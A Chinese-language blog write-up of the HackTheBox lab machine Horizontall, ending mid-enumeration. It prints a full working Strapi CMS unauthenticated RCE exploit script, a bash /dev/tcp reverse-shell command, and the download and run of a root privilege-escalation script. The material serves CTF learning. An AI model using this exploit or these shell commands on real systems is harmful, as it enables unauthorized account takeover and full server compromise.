title: HackTheBox-Horizontall-phar反序列化 author: Mosaic Theory layout: true categories: 漏洞实验 tags:
• 打靶日记
I think it's hard winning a war with words.
我认为纸上谈兵没什么作用。
HackTheBox-Horizontall
Recon:
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-05-17 03:37:03 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 10.10.11.105
Discovered open port 80/tcp on 10.10.11.105 Nmap scan report for horizontall.htb (10.10.11.105)
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)
| 256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
|_ 256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-title: Did not follow redirect to http://horizontall.htb
|_http-server-header: nginx/1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.16 seconds>> whatweb http://horizontall.htb
http://horizontall.htb [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][nginx/1.14.0 (Ubuntu)], IP[10.10.11.105], Script, Title[horizontall], X-UA-Compatible[IE=edge], nginx[1.14.0]页面没有任何内容,所见非真:
>> dirsearch -u http://horizontall.htb
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /home/mosaictheory/.dirsearch/reports/horizontall.htb/_22-05-17_11-43-09.txt
Error Log: /home/mosaictheory/.dirsearch/logs/errors-22-05-17_11-43-09.log
Target: http://horizontall.htb/
[11:43:10] Starting:
[11:43:12] 301 - 194B - /js -> http://horizontall.htb/js/
[11:43:51] 301 - 194B - /css -> http://horizontall.htb/css/
[11:43:56] 200 - 4KB - /favicon.ico
[11:44:01] 301 - 194B - /img -> http://horizontall.htb/img/
[11:44:02] 200 - 901B - /index.html
[11:44:03] 403 - 580B - /js/这个站点像是一个谎言,我应该寻找其他站点:
>> gobuster vhost -u http://horizontall.htb/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t200
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://horizontall.htb/
[+] Method: GET
[+] Threads: 200
[+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/05/17 12:09:46 Starting gobuster in VHOST enumeration mode
===============================================================
Found: api-prod.horizontall.htb (Status: 200) [Size: 413]
===============================================================
2022/05/17 12:11:17 Finished
===============================================================>> whatweb http://api-prod.horizontall.htb/
http://api-prod.horizontall.htb/ [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][nginx/1.14.0 (Ubuntu)], IP[10.10.11.105], Strict-Transport-Security[max-age=31536000; includeSubDomains], Title[Welcome to your API], UncommonHeaders[content-security-policy], X-Frame-Options[SAMEORIGIN], X-Powered-By[Strapi ], X-UA-Compatible[IE=edge], X-XSS-Protection[1; mode=block], nginx[1.14.0] Strapi cms.页面也很简单,只有一条欢迎语句:
>> curl http://api-prod.horizontall.htb/
html>
<html>
<head>
<meta charset="utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<title>Welcome to your APItitle>
<meta name="viewport" content="width=device-width, initial-scale=1" />
<style>
style>
head>
<body lang="en">
<section>
<div class="wrapper">
<h1>Welcome.h1>
div>
section>
body>
html>>> dirsearch -u http://api-prod.horizontall.htb
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /home/mosaictheory/.dirsearch/reports/api-prod.horizontall.htb/_22-05-17_12-15-04.txt
Error Log: /home/mosaictheory/.dirsearch/logs/errors-22-05-17_12-15-04.log
Target: http://api-prod.horizontall.htb/
[12:15:04] Starting:
[12:15:18] 200 - 854B - /ADMIN
[12:15:18] 200 - 854B - /Admin
[12:15:18] 200 - 854B - /Admin/login/
[12:15:23] 400 - 67B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[12:15:53] 200 - 1KB - /favicon.ico
[12:15:58] 200 - 413B - /index.html
[12:16:17] 200 - 121B - /robots.txt
[12:16:17] 200 - 507B - /reviews
Task Completed
我需要想方法获取Strapi的版本,在源码中会有这么一串提示:
A lot of magic happens in this file. HtmlWebpackPlugin automatically includes all assets (e.g. bundle.js, main.css) with the correct HTML tags, which is why they are missing in this HTML file. Don't add any assets here! (Check out webpackconfig.js if you want to know more) 
>> searchsploit strapi 3.0.0-beta.17.4
--------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------- ---------------------------------
Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated) | multiple/webapps/50239.py
Strapi CMS 3.0.0-beta.17.4 - Set Password (Unauthenticated) (Metasploit) | nodejs/webapps/50716.rb
--------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
>> searchsploit -m multiple/webapps/50239.py
Exploit: Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated)
URL: https://www.exploit-db.com/exploits/50239
Path: /usr/share/exploitdb/exploits/multiple/webapps/50239.py
File Type: Python script, ASCII text executable
Copied to: /home/mosaictheory/50239.py# Exploit Title: Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 2021-08-30
# Exploit Author: Musyoka Ian
# Vendor Homepage: https://strapi.io/
# Software Link: https://strapi.io/
# Version: Strapi CMS version 3.0.0-beta.17.4 or lower
# Tested on: Ubuntu 20.04
# CVE : CVE-2019-18818, CVE-2019-19609
#!/usr/bin/env python3
import requests
import json
from cmd import Cmd
import sys
if len(sys.argv) != 2:
print("[-] Wrong number of arguments provided")
print("[*] Usage: python3 exploit.py \n" )
sys.exit()
class Terminal(Cmd):
prompt = "$> "
def default(self, args):
code_exec(args)
def check_version():
global url
print("[+] Checking Strapi CMS Version running")
version = requests.get(f"{url}/admin/init").text
version = json.loads(version)
version = version["data"]["strapiVersion"]
if version == "3.0.0-beta.17.4":
print("[+] Seems like the exploit will work!!!\n[+] Executing exploit\n\n")
else:
print("[-] Version mismatch trying the exploit anyway")
def password_reset():
global url, jwt
session = requests.session()
params = {"code" : {"$gt":0},
"password" : "SuperStrongPassword1",
"passwordConfirmation" : "SuperStrongPassword1"
}
output = session.post(f"{url}/admin/auth/reset-password", json = params).text
response = json.loads(output)
jwt = response["jwt"]
username = response["user"]["username"]
email = response["user"]["email"]
if "jwt" not in output:
print("[-] Password reset unsuccessfull\n[-] Exiting now\n\n")
sys.exit(1)
else:
print(f"[+] Password reset was successfully\n[+] Your email is: {email}\n[+] Your new credentials are: {username}:SuperStrongPassword1\n[+] Your authenticated JSON Web Token: {jwt}\n\n")
def code_exec(cmd):
global jwt, url
print("[+] Triggering Remote code executin\n[*] Rember this is a blind RCE don't expect to see output")
headers = {"Authorization" : f"Bearer {jwt}"}
data = {"plugin" : f"documentation && $({cmd})",
"port" : "1337"}
out = requests.post(f"{url}/admin/plugins/install", json = data, headers = headers)
print(out.text)
if __name__ == ("__main__"):
url = sys.argv[1]
if url.endswith("/"):
url = url[:-1]
check_version()
password_reset()
terminal = Terminal()
terminal.cmdloop()这是一个组合漏洞,首先会重置用户的密码,虽然我不知道是哪个,看目录像是admin,重置成功后便会生成返回一个JWT Token,然后带着令牌去请求/admin/plugins/install执行cmd,Rember this is a blind RCE don't expect to see output。
>> python3 50239.py http://api-prod.horizontall.htb
[+] Checking Strapi CMS Version running
[+] Seems like the exploit will work!!!
[+] Executing exploit
[+] Password reset was successfully
[+] Your email is: admin@horizontall.htb
[+] Your new credentials are: admin:SuperStrongPassword1
[+] Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjUyNzYzMDk0LCJleHAiOjE2NTUzNTUwOTR9.0WODcG0DqsHwETYjBNYwk9eVrLdIcY1xRV-rbkyDpFQ
$> id
[+] Triggering Remote code executin
[*] Rember this is a blind RCE don't expect to see output
{"statusCode":400,"error":"Bad Request","message":[{"messages":[{"id":"An error occurred"}]}]}
$> bash -c 'bash -i >& /dev/tcp/10.10.16.7/9001 0>&1'
[+] Triggering Remote code executin
[*] Rember this is a blind RCE don't expect to see output
Reverse shell:
有对user目录的读取权限:
>> nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.105] 36446
bash: cannot set terminal process group (1787): Inappropriate ioctl for device
bash: no job control in this shell
strapi@horizontall:~/myapi$
strapi@horizontall:~/myapi$ ls
api config favicon.ico package.json public
build extensions node_modules package-lock.json README.md
strapi@horizontall:~/myapi$ ls /home/
developer
strapi@horizontall:~/myapi$ cat /home/developer/user.txt
e1...................................密码无法复用:
strapi@horizontall:~/myapi$ sudo -l
[sudo] password for strapi:
Sorry, try again.
[sudo] password for strapi:
Sorry, try again.
[sudo] password for strapi:
sudo: 3 incorrect password attempts
strapi@horizontall:~/myapi$ strapi@horizontall:/$ find / -perm /6000 2>/dev/null
/sbin/pam_extrausers_chkpwd
/sbin/unix_chkpwd
/usr/bin/mlocate
/usr/bin/sudo
/usr/bin/newgidmap
/usr/bin/bsd-write
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/chage
/usr/bin/at
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/wall
/usr/bin/crontab
/usr/bin/ssh-agent
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/expiry
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/x86_64-linux-gnu/utempter/utempter
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/local/share/fonts
/usr/local/lib/python3.6
/usr/local/lib/python3.6/dist-packages
/usr/local/lib/python2.7
/usr/local/lib/python2.7/dist-packages
/usr/local/lib/python2.7/site-packages
/var/mail
/var/log/journal
/var/log/journal/3cc9504f7ded4867a4c8ca16476b1378
/var/local
/bin/fusermount
/bin/ping
/bin/su
/bin/umount
/bin/mount
strapi@horizontall:/$ CVE-2021-2043:
这个漏洞是新漏洞,不能作数:
strapi@horizontall:~$ wget http://10.10.16.7/CVE-2021-2043.py
--2022-05-17 05:06:37-- http://10.10.16.7/CVE-2021-2043.py
Connecting to 10.10.16.7:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3448 (3.4K) [text/x-python]
Saving to: ‘CVE-2021-2043.py’
CVE-2021-2043.py 100%[===================>] 3.37K --.-KB/s in 0.1s
2022-05-17 05:06:38 (24.6 KB/s) - ‘CVE-2021-2043.py’ saved [3448/3448]
strapi@horizontall:~$ ls
CVE-2021-2043.py myapi
strapi@horizontall:~$ python3 CVE-2021-2043.py
# ID
sh: 1: ID: not found
# id
uid=0(root) gid=0(root) groups=0(root),1001(strapi)
# CVE-2021-3129:
strapi@horizontall:~$ netstat -ano
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State Timer
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.1:1337 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 144 10.10.11.105:36446 10.10.16.7:9001 ESTABLISHED on (0.34/0/0)
tcp6 0 0 :::80 :::* LISTEN off (0.00/0/0)
tcp6 0 0 :::22 :::* LISTEN off (0.00/0/0)
udp 0 0 10.10.11.105:50522 1.1.1.1:53 ESTABLISHED off (0.00/0/0)3306应该是个数据库,1337是欢迎页面:
strapi@horizontall:~$ curl 127.0.0.1:1337
<head>
"utf-8" />
"X-UA-Compatible" content="IE=edge,chrome=1" />
Welcome to your API
"viewport" content="width=device-width, initial-scale=1" />
"en">
"wrapper">
Welcome.